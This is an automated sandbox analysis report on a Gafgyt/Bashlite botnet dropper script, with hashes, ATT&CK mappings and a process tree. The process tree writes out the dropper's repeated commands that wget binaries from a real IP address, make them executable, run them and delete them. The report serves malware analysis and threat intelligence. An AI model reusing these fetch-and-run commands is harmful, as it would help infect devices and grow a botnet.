gafgyt | cdf836341472a8e4a991f003f2c6f42cef1d3da82640755ab2ab2cadb47da3a7

Analysis

max time kernel
150s
max time network
147s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
02-01-2025 12:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sex.sh
Size

1KB
MD5

c393be1bb1bbee668b95b671620d63c0
SHA1

cce8f8abadfd7e5b74d20a8bce40468662e3ffa9
SHA256

cdf836341472a8e4a991f003f2c6f42cef1d3da82640755ab2ab2cadb47da3a7
SHA512

9bfc5bf1c69d34605942daa875afebd493047c715009639302aac56256abfe6619ba37715dcb493f137329517181c7d3ebbcfb1395ad5ac3ae7bec360c20f721

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Signatures

Detected Gafgyt variant 10 IoCs

resource	yara_rule
behavioral3/files/fstream-1.dat	family_gafgyt
behavioral3/files/fstream-2.dat	family_gafgyt
behavioral3/files/fstream-3.dat	family_gafgyt
behavioral3/files/fstream-4.dat	family_gafgyt
behavioral3/files/fstream-5.dat	family_gafgyt
behavioral3/files/fstream-6.dat	family_gafgyt
behavioral3/files/fstream-7.dat	family_gafgyt
behavioral3/files/fstream-8.dat	family_gafgyt
behavioral3/files/fstream-9.dat	family_gafgyt
behavioral3/files/fstream-10.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
822	chmod
840	chmod
750	chmod
768	chmod
780	chmod
793	chmod
806	chmod
835	chmod
726	chmod
738	chmod
744	chmod
757	chmod
830	chmod

Executes dropped EXE 10 IoCs

ioc	pid	Process
/tmp/mips	727	mips
/tmp/mipsel	739	mipsel
/tmp/sh4	745	sh4
/tmp/arm61	758	arm61
/tmp/ppc	781	ppc
/tmp/586	794	586
/tmp/m68k	808	m68k
/tmp/dc	823	dc
/tmp/dss	831	dss
/tmp/co	836	co

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	727	mips

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
727	mips
730	rm
733	wget
739	mipsel
741	rm
709	wget

Writes file to tmp directory 10 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/sh4	wget
File opened for modification	/tmp/ppc	wget
File opened for modification	/tmp/m68k	wget
File opened for modification	/tmp/dss	wget
File opened for modification	/tmp/co	wget
File opened for modification	/tmp/mipsel	wget
File opened for modification	/tmp/arm61	wget
File opened for modification	/tmp/586	wget
File opened for modification	/tmp/dc	wget

/tmp/sex.sh
/tmp/sex.sh
1⤵
PID:704
- /usr/bin/wget
  wget http://31.13.224.110/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:709
- /bin/chmod
  chmod +x mips
  2⤵
  - File and Directory Permissions Modification
  PID:726
- /tmp/mips
  ./mips
  2⤵
  - Executes dropped EXE
  - Changes its process name
  - System Network Configuration Discovery
  PID:727
- /bin/rm
  rm -rf mips
  2⤵
  - System Network Configuration Discovery
  PID:730
- /usr/bin/wget
  wget http://31.13.224.110/mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:733
- /bin/chmod
  chmod +x mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/mipsel
  ./mipsel
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:739
- /bin/rm
  rm -rf mipsel
  2⤵
  - System Network Configuration Discovery
  PID:741
- /usr/bin/wget
  wget http://31.13.224.110/sh4
  2⤵
  - Writes file to tmp directory
  PID:742
- /bin/chmod
  chmod +x sh4
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/sh4
  ./sh4
  2⤵
  - Executes dropped EXE
  PID:745
- /bin/rm
  rm -rf sh4
  2⤵
  PID:747
- /usr/bin/wget
  wget http://31.13.224.110/x86
  2⤵
  PID:748
- /bin/chmod
  chmod +x x86
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/x86
  ./x86
  2⤵
  PID:751
- /bin/rm
  rm -rf x86
  2⤵
  PID:752
- /usr/bin/wget
  wget http://31.13.224.110/arm61
  2⤵
  - Writes file to tmp directory
  PID:753
- /bin/chmod
  chmod +x arm61
  2⤵
  - File and Directory Permissions Modification
  PID:757
- /tmp/arm61
  ./arm61
  2⤵
  - Executes dropped EXE
  PID:758
- /bin/rm
  rm -rf arm61
  2⤵
  PID:761
- /usr/bin/wget
  wget http://31.13.224.110/i686
  2⤵
  PID:762
- /bin/chmod
  chmod +x i686
  2⤵
  - File and Directory Permissions Modification
  PID:768
- /tmp/i686
  ./i686
  2⤵
  PID:770
- /bin/rm
  rm -rf i686
  2⤵
  PID:771
- /usr/bin/wget
  wget http://31.13.224.110/ppc
  2⤵
  - Writes file to tmp directory
  PID:773
- /bin/chmod
  chmod +x ppc
  2⤵
  - File and Directory Permissions Modification
  PID:780
- /tmp/ppc
  ./ppc
  2⤵
  - Executes dropped EXE
  PID:781
- /bin/rm
  rm -rf ppc
  2⤵
  PID:785
- /usr/bin/wget
  wget http://31.13.224.110/586
  2⤵
  - Writes file to tmp directory
  PID:786
- /bin/chmod
  chmod +x 586
  2⤵
  - File and Directory Permissions Modification
  PID:793
- /tmp/586
  ./586
  2⤵
  - Executes dropped EXE
  PID:794
- /bin/rm
  rm -rf 586
  2⤵
  PID:797
- /usr/bin/wget
  wget http://31.13.224.110/m68k
  2⤵
  - Writes file to tmp directory
  PID:798
- /bin/chmod
  chmod +x m68k
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/m68k
  ./m68k
  2⤵
  - Executes dropped EXE
  PID:808
- /bin/rm
  rm -rf m68k
  2⤵
  PID:811
- /usr/bin/wget
  wget http://31.13.224.110/dc
  2⤵
  - Writes file to tmp directory
  PID:813
- /bin/chmod
  chmod +x dc
  2⤵
  - File and Directory Permissions Modification
  PID:822
- /tmp/dc
  ./dc
  2⤵
  - Executes dropped EXE
  PID:823
- /bin/rm
  rm -rf dc
  2⤵
  PID:826
- /usr/bin/wget
  wget http://31.13.224.110/dss
  2⤵
  - Writes file to tmp directory
  PID:827
- /bin/chmod
  chmod +x dss
  2⤵
  - File and Directory Permissions Modification
  PID:830
- /tmp/dss
  ./dss
  2⤵
  - Executes dropped EXE
  PID:831
- /bin/rm
  rm -rf dss
  2⤵
  PID:833
- /usr/bin/wget
  wget http://31.13.224.110/co
  2⤵
  - Writes file to tmp directory
  PID:834
- /bin/chmod
  chmod +x co
  2⤵
  - File and Directory Permissions Modification
  PID:835
- /tmp/co
  ./co
  2⤵
  - Executes dropped EXE
  PID:836
- /bin/rm
  rm -rf co
  2⤵
  PID:838
- /usr/bin/wget
  wget http://31.13.224.110/scar
  2⤵
  PID:839
- /bin/chmod
  chmod +x scar
  2⤵
  - File and Directory Permissions Modification
  PID:840
- /tmp/scar
  ./scar
  2⤵
  PID:841
- /bin/rm
  rm -rf scar
  2⤵
  PID:842

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/586

Filesize
94KB

MD5
c61c82ec02a70a7dfc67f05e58ac836d

SHA1
64f47fe6aaf1e4190ea5bfdef94175178397a6c7

SHA256
1de70cafe7cea0a83673f5341d9437b09a2814e2dfef819f73775f06836d9097

SHA512
11d91cbbb15ef45b45d58d0e080acb7f247f50ffe3c68abd6fb94a0a7eeb1f41ee98feac5822973a228e2c22c50f1043406e909be69f3cef7f7affe98169785c

Download Submit
/tmp/arm61

Filesize
136KB

MD5
cc2c559dcf0b6b8a969dfe141afcb8a7

SHA1
9a51751c74638501f9bc94ee0070d61fb8c952c3

SHA256
fbafa6393f825b6da94ea2b5517d759ff46564f563dba155f17a277683d75e1c

SHA512
aba1ad2c7d1e51c3c98d2704e58e92accff328df23dfa0b2a219fd8e3775af8ba2e93157765da943f1c49721ecba6340fb46691112deb841a9cafc0f4a10432b

Download Submit
/tmp/co

Filesize
117KB

MD5
816c9789085d1dc828c5bc15f4b324c9

SHA1
6fa1a20a949f5cac73c11f2ec9402599dc8b1068

SHA256
c35e6ac5fe1aaf98f735c8dfe3a5374b21dbd1e772c29a26ec37ae2e94c0fe8f

SHA512
4902a7bbc1d3f89384ba87d8ac23e77b3aa8040d50d65826199ce878f2c5c868689b48cfb67642c2f660a0a1e9ade67e535e6fba931daaceaf8f9f39e4c395e0

Download Submit
/tmp/dc

Filesize
123KB

MD5
a7ea51483786a5e5aacfa23a2347ea0b

SHA1
e243c9f52a3c774e275ba53befa655abd4feb2e0

SHA256
594319e3765373231c25d88092ffda29e2d0837c1c8d34ea2a407560e9df61a1

SHA512
a88f9c4f3c2e639d394f5378704f6f8929fa5e03e9410c330294440bf99e640fa1de8c0edb1abfc79f4762e101745773236c8a50085fe6e7b787ff04fb6c18ba

Download Submit
/tmp/dss

Filesize
124KB

MD5
a06d3fcd811e5560ca040e3891682bfb

SHA1
1e9bb2c23ccde930efe57c52fafaa07ac2450f1b

SHA256
937c59d1e4a9cfabaf6210253757bb2fe9d07398d34f99c0871d3b10da2929f5

SHA512
369338d59acc4861a2dd36591d4ab9cc43c7cadbbbc9c0fb002d7c30225b902f7937f046e5c2990b9c62491ad835ffb2a6aa68d9f5ffddeec829e91db1bf7364

Download Submit
/tmp/m68k

Filesize
111KB

MD5
638c9d3db4a55412b60783a2b692d469

SHA1
8fdb065fa1abf5c959f47518f920025d2707e381

SHA256
4beede57ee08715bccefe5a287e7a5b7ca4d1a6a3d11f7c8cf6e47cbd62a4361

SHA512
77edfaa825acfb5b1532f9e21972be603ed0f6a1ca908ef6964f701b371a9f0dd465b1ba4ea9a2f7496d345d34e1e0d9c4e89116c71d62b2867df57200ed3e61

Download Submit
/tmp/mips

Filesize
148KB

MD5
dce29bdff1efd8b56470beb84800f340

SHA1
29744f0f8a1bfb02606d00b5eafd029b6006e9aa

SHA256
ff80f728ab5574dd193e529d4cb4c5a062d7f57bea0de856722f6373e0235d60

SHA512
967c004b6341f97572cef3aba4baf5b5346aaa4c8d9731a21c8dfd9994d9f65895f8946235f7103f51888a442827f8b3675642686167cb99d5062f4d3cbcd651

Download Submit
/tmp/mipsel

Filesize
148KB

MD5
085aaca192395078f3266ad40ca3820e

SHA1
391c2a7bbd936e9de7c33ff8c31858a4a120fa54

SHA256
89ef04dea955b2724b47529801174a1a00b0533db594178efbb5888d37a87474

SHA512
15e98139c7bc0551bf6eb5dbdb07b5de07fe01b3e4a5ace72918adb1e36e071d0d3e606a8019c58e1275f4e57f2b0ece8dbdd58de4cb5f9f30512013fea6db0e

Download Submit
/tmp/ppc

Filesize
110KB

MD5
01a92f4cda4ed8855ba45ade51ee70b2

SHA1
a6b61a2b34500929b548657556c29d91896d0a08

SHA256
0c82739271f51c1040662ebc13805a749ac51c44e5355d60fb9fe1764efa2415

SHA512
cf44cacfcd1d0361757b4216334bdd3e9d5b8045ec48303c2e191cfc2fb8807744a0b382b078ad3225ae3c36f2d168aa4aa2abeebc58d9a30ed2882b6807506e

Download Submit
/tmp/sh4

Filesize
105KB

MD5
488d96eefc3e512cad6dbf9ead797b9d

SHA1
dc2352927d0928b2de6304bc1fd81332f35eebf4

SHA256
e4bbb9fb66fc81dd445f598147810ea8d76eb4799a79561403c0902bb192ad45

SHA512
9b9ae7893c692c3ffb679b47e2fcac3e3334d3f590ae026bf7c10122586a2a5e400a19ce4e414a4afe6f10da61dc2bbd0a14686cd48d6ea2d5e90d7a8bbe2ef9

Download Submit